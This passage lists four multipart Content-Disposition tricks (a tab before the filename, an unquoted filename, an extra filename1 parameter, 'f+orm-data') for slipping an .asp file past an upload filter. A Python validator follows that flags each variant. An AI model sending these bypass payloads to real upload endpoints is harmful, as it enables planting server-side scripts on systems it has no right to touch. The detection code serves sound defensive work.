Original request packet:
------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="cesafe.asp"
Content-Type: text/html
Method 1: bypass by prefixing the filename with [0x09]:
------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="[0x09]cesafe.asp"
Content-Type: text/html
Method 2: bypass by removing the double quotes around the filename:
------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename=cesafe.asp
Content-Type: text/html
Method 3: bypass by adding a filename1 parameter and assigning it a value:
------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name="filepath"; filename="cesafe.asp";filename1="test.jpg"
Content-Type: text/html
Method 4: bypass by changing the form variable into the combination f+orm:
------WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: f+orm-data; name="filepath";filename&
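
Each variant above departs from the canonical header form, so a filter or upload handler that parses the header strictly can reject all of them instead of pattern-matching on the filename. The following is an added example, not code from the original page; check_content_disposition, its messages and the sample values are hypothetical and constructed for illustration.

```python
import re

# One parameter: ;key=value, value either double-quoted or a bare run.
_PARAM = re.compile(r';\s*([^=;\s"]+)=("[^"]*"|[^;"]*)\s*')
_ALLOWED = {"name", "filename"}

def check_content_disposition(value):
    """Return the reasons `value` deviates from the canonical
    form-data header; an empty list means it is canonical."""
    problems = []
    head = re.match(r'[^;]*', value)
    if head.group(0).strip() != "form-data":
        problems.append("disposition type is not exactly form-data")
    rest, pos, seen = value[head.end():], 0, set()
    while pos < len(rest):
        m = _PARAM.match(rest, pos)
        if m is None:
            problems.append("malformed parameter section")
            break
        key, raw = m.group(1).lower(), m.group(2)
        pos = m.end()
        if key not in _ALLOWED:
            problems.append("unexpected parameter: " + key)
        elif key in seen:
            problems.append("duplicate parameter: " + key)
        seen.add(key)
        if not raw.startswith('"'):
            problems.append("unquoted value for " + key)
        if any(ord(c) < 0x20 or ord(c) == 0x7F for c in raw):
            problems.append("control character in " + key + " value")
    return problems

# Constructed sample values modelled on the requests shown above.
SAMPLES = {
    "original": 'form-data; name="filepath"; filename="cesafe.asp"',
    "method1": 'form-data; name="filepath"; filename="\tcesafe.asp"',
    "method2": 'form-data; name="filepath"; filename=cesafe.asp',
    "method3": 'form-data; name="filepath"; filename="cesafe.asp";filename1="test.jpg"',
    "method4": 'f+orm-data; name="filepath"',
}

if __name__ == "__main__":
    for label, header in SAMPLES.items():
        print(label, check_content_disposition(header) or "canonical")
```

Rejecting any request with a non-empty result keeps the filter and the backend parser from disagreeing about which filename was sent.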